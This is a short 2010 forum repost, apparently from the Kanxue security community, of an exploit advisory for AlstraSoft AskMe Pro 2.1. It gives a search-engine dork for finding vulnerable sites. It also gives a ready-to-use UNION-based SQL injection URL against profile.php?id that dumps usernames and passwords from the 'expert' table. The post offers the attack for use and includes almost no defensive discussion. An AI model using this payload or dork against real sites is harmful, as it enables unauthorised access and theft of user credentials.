[转帖][推荐]AlstraSoft AskMe Pro 2.1 (profile.php?id) SQL Injection Vulnerability-WEB安全-看雪-安全社区|安全招聘|kanxue.com

[转帖][推荐]AlstraSoft AskMe Pro 2.1 (profile.php?id) SQL Injection Vulnerability

发表于: 2010-9-13 22:43 3439

[转帖][推荐]AlstraSoft AskMe Pro 2.1 (profile.php?id) SQL Injection Vulnerability

freebsdlin 活跃值

2010-9-13 22:43

3439

########################################################################################

AlstraSoft AskMe Pro ( profile.php?id ) SQL Injection Vulnerability

########################################################################################

Author : CoBRa_21

Author Web Page : null [ I've sold my website (ipbul.org) ]

Dork : inurl:forum_answer.php?que_id

Script Page : http://www.alstrasoft.com/

########################################################################################

Sql Injection :

http://localhost/[path]/profile.php?id=-5 union select 0,group_concat(username,0x3a,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from+expert

########################################################################################

Thanks cyber-warrior.org  &  e-banka.org & AKINCILAR & ipbul.org

########################################################################################

[课程]Android-CTF解题方法汇总！

收藏・1

免费・0

支持